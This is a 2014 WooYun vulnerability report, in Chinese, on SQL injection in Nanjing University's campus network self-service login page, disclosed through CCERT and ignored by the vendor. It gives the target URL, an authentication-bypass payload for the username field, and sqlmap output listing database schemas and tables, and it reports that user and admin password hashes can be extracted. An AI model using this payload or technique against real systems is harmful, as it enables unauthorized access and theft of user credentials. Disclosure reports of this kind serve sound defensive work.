当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-054788

漏洞标题:南京大学校园网络自助服务系统SQL注入漏洞

相关厂商:南京大学

漏洞作者: eaglesky

提交时间:2014-03-28 10:39

修复时间:2014-04-02 10:40

公开时间:2014-04-02 10:40

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:6

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-03-28: 细节已通知厂商并且等待厂商处理中
2014-04-02: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

南京大学校园网络自助服务系统的登录页面有明显的SQL注入漏洞。用户名字段没有做任何过滤处理,爆出后台数据库类型,所有数据表的内容,有着泄露大量重要信息的危险

详细说明:

http://bras.nju.edu.cn:8080/selfservice/login
南京大学校园网络自助服务系统的登录页面有明显的SQL注入漏洞。
在用户名那里填写例如1' or username='b10125XXX这样的语句时,竟然可以像直接输入学号一样正常登陆。截图如下:

POC.png


使用sqlmap进行注入点检测,存在SQL注入漏洞。程序输出截图如下:

Injection_Point.png


南京大学的Bras网络登陆系统有着如此明显的注入漏洞,所有学生用户的关键信息将有可能被黑客爆出,强烈建议南京大学网络中心加强安全防护

漏洞证明:

使用sqlmap进行database enumeration,得到了所有schema的数据库名:

[15:49:43] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[15:49:43] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[15:49:43] [INFO] fetching database (schema) names
[15:49:43] [INFO] fetching number of databases
[15:49:43] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[15:49:43] [INFO] retrieved:
[15:49:44] [WARNING] reflective value(s) found and filtering out
16
[15:49:47] [INFO] retrieved: CTXSYS
[15:50:06] [INFO] retrieved: DBSNMP
[15:50:24] [INFO] retrieved: DMSYS
[15:50:39] [INFO] retrieved: EXFSYS
[15:50:57] [INFO] retrieved: JNAAS
[15:51:13] [INFO] retrieved: MDSYS
[15:51:28] [INFO] retrieved: OLAPSYS
[15:51:49] [INFO] retrieved: ORDSYS
[15:52:07] [INFO] retrieved: OUTLN
[15:52:23] [INFO] retrieved: SCOTT
[15:52:39] [INFO] retrieved: SYS
[15:52:49] [INFO] retrieved: SYSMAN
[15:53:07] [INFO] retrieved: SYSTEM
[15:53:25] [INFO] retrieved: TSMSYS
[15:53:44] [INFO] retrieved: WMSYS
[15:54:00] [INFO] retrieved: XDB
[15:54:10] [INFO] fetching tables for databases: 'CTXSYS, DBSNMP, DMSYS, EXFSYS, JNAAS, MDSYS, OLAPSYS, ORDSYS, OUTLN, SCOTT, SYS, SYSMAN, SYSTEM, TSMSYS, WMSYS, XDB'


其中JNAAS数据库是登陆查询的current databse,枚举该数据库中表名如下:

[15:54:10] [INFO] fetching tables for databases: 'CTXSYS, DBSNMP, DMSYS, EXFSYS, JNAAS, MDSYS, OLAPSYS, ORDSYS, OUTLN, SCOTT, SYS, SYSMAN, SYSTEM, TSMSYS, WMSYS, XDB'
[15:54:10] [INFO] fetching number of tables for database 'JNAAS'
[15:54:10] [INFO] retrieved: 59
[15:54:13] [INFO] retrieved: USER_OPER_LOG
[15:54:33] [INFO] retrieved: ACCESS_AREA
[15:54:50] [INFO] retrieved: ACCESS_NAS
[15:54:58] [INFO] retrieved: ACCT_01
[15:55:05] [INFO] retrieved: ACCT_02
[15:55:10] [INFO] retrieved: ACCT_03
[15:55:14] [INFO] retrieved: ACCT_04
[15:55:18] [INFO] retrieved: ACCT_05
[15:55:22] [INFO] retrieved: ACCT_06
[15:55:26] [INFO] retrieved: ACCT_07
[15:55:31] [INFO] retrieved: ACCT_08
[15:55:35] [INFO] retrieved: ACCT_09
[15:55:39] [INFO] retrieved: ACCT_10
[15:55:44] [INFO] retrieved: ACCT_11
[15:55:49] [INFO] retrieved: ACCT_12
[15:55:53] [INFO] retrieved: ACCT_ONLINE
[15:56:03] [INFO] retrieved: ADMINGROUP
[15:56:18] [INFO] retrieved: ADMINGROUPREALM
[15:56:28] [INFO] retrieved: ADMINUSER
[15:56:36] [INFO] retrieved: ADMIN_OPER_LOG
[15:56:52] [INFO] retrieved: AREA
[15:56:58] [INFO] retrieved: AUTHLOG
[15:57:08] [INFO] retrieved: BATCH_INPAYAMOUNT
[15:57:33] [INFO] retrieved: BATCH_INPAYAMOUNT_DETAIL
[15:57:48] [INFO] retrieved: BILL
[15:57:54] [INFO] retrieved: BLACKLIST
[15:58:07] [INFO] retrieved: CARD
[15:58:14] [INFO] retrieved: CARD_ACTIVE
[15:58:26] [INFO] retrieved: CLOSE_REQUEST
[15:58:44] [INFO] retrieved: ECARD
[15:58:53] [INFO] retrieved: EXT_PLAN
[15:59:04] [INFO] retrieved: INPAYAMOUNT
[15:59:21] [INFO] retrieved: MANAGE_IP
[15:59:36] [INFO] retrieved: MAX_LIMIT
[15:59:48] [INFO] retrieved: NAS
[15:59:54] [INFO] retrieved: ONLINE_DAY
[16:00:10] [INFO] retrieved: ONLINE_WEEK
[16:00:20] [INFO] retrieved: ONLINE_MONTH
[16:00:31] [INFO] retrieved: ONLINE_YEAR
[16:00:42] [INFO] retrieved: ONLINE_STATISTICS
[16:01:00] [INFO] retrieved: PLAN
[16:01:09] [INFO] retrieved: PRE_USER
[16:01:21] [INFO] retrieved: SERVICE
[16:01:32] [INFO] retrieved: SETTINGS
[16:01:44] [INFO] retrieved: TIME
[16:01:52] [INFO] retrieved: TIME_LIST
[16:02:05] [INFO] retrieved: USERGROUP
[16:02:22] [INFO] retrieved: USERINFO
[16:02:32] [INFO] retrieved: USER_APPEND
[16:02:47] [INFO] retrieved: USER_APPEND_DEFINE
[16:03:02] [INFO] retrieved: USER_APPEND_OPTIONS
[16:03:17] [INFO] retrieved: USER_MODIFY
[16:03:28] [INFO] retrieved: PLUGINS_NOTICE
[16:03:49] [INFO] retrieved: PLUGINS_FC_IP_LIST
[16:04:07] [INFO] retrieved: NOTICE
[16:04:17] [INFO] retrieved: PLUGINS_BZ
[16:04:35] [INFO] retrieved: PLUGINS_FC_STATIC_IP_LIST
[16:05:09] [INFO] retrieved: PLUGINS_FC_ONLINE
[16:05:22] [INFO] retrieved: PLUGINS_OA_USERINFO


其中USERINFO表便是记录学生上网账号的所有信息的数据表。爆出的注入点权限非常大,可以根据学号随意select出相应的password的hash:

Password_Hash.png


其中的ADMINUSER表中也记录了管理员的所有信息,其中的密码均为md5加密的,但是由于密码设置过于简单,大部分可以被暴力破解出来,截图如下:

ADMINUSER.png

修复方案:

希望南京大学网络中心可以尽快修补漏洞,避免造成不必要信息泄露

版权声明:转载请注明来源 eaglesky@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-04-02 10:40

厂商回复:

最新状态:

暂无